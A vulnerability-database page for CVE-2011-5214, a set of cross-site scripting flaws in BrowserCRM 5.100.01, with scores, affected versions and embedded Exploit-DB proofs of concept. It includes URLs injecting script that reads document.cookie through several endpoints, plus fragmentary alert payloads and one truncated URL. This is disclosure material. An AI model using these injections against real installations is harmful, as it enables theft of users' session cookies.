CVE-2011-5214
Published 2012-10-25
Priority P4 · 24 · medium · 4.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 4.85% (90.9th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM 5.100.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) modules/admin/admin_module_index.php, or (3) modules/calendar/customise_calendar_times.php; login[] parameter to (4) index.php or (5) pub/clients.php; or framed parameter to (6) licence/index.php or (7) licence/view.php.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| browsercrm | browsercrm | <= 5.100.01 | — |
No detection rules found.
Exploit-DB
BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting
exploitdb·2011-12-14
---
source: https://www.securityfocus.com/bid/51060/info
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
alert(1);'>
alert(2);'>
alert(3);'>
alert(4);'>
alert(5);'>
alert(6);'>
alert(7);'>
Exploit-DB
BrowserCRM 5.100.1 - URI Cross-Site Scripting
exploitdb·2011-12-14
---
source: https://www.securityfocus.com/bid/51060/info
http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.
Exploit-DB
BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting
exploitdb·2011-12-14
---
source: https://www.securityfocus.com/bid/51060/info
alert(1);'>
alert(2);'>
alert(3);'>
alert(4);'>
alert(5);'>
alert(6);'>
Exploit-DB
BrowserCRM 5.100.1 - 'framed' Cross-Site Scripting
exploitdb·2011-12-14
---
source: https://www.securityfocus.com/bid/51060/info
http://www.example.com/licence/index.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
No writeups or analysis indexed.
http://osvdb.org/77728
http://osvdb.org/77729
http://osvdb.org/77730
http://osvdb.org/77731
http://osvdb.org/77732
http://secunia.com/advisories/47217
https://exchange.xforce.ibmcloud.com/vulnerabilities/71827
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_browser_crm.html